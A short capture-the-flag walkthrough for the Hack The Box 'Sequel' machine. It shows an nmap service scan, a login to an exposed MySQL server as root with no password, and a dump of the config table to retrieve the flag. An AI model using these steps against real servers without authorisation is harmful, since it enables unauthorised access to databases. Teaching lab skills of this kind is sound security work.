Enumeration
As usual, let's start with our nmap
nmap -sV -sC IP-sV : service detection
-sC : performs a script scan
Replace IP by the IP of the target machine (Sequel)
Note: The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.
Port 3306 is usually associated with MySQL protocol. MySQL is a service used for database management such as creating, modifying or deleting databases.
Foothold
Type this command to get more info on how to use the command sql
mysql --helpWe find that we need to add -u followed by the username:
We find that we need to add -h followed my the hostname or IP:
We don't know any username but we can try our luck with the user root.
mysql -u root -h 10.129.231.168
Notice that we were not even asked for a password, meaning that the administrator forgot to set up a password. We are in luck!
Now that we are in the database, let's type:
show databases;This command lists all the databases available.
use htb;This command advises that we want to use the database called htb
show tables;This command is used to show us all the tables available in the database htb
SELECT * from config;This means we want to select and show everything (rows and columns) that is in the table config
Congratulations! You got the flag!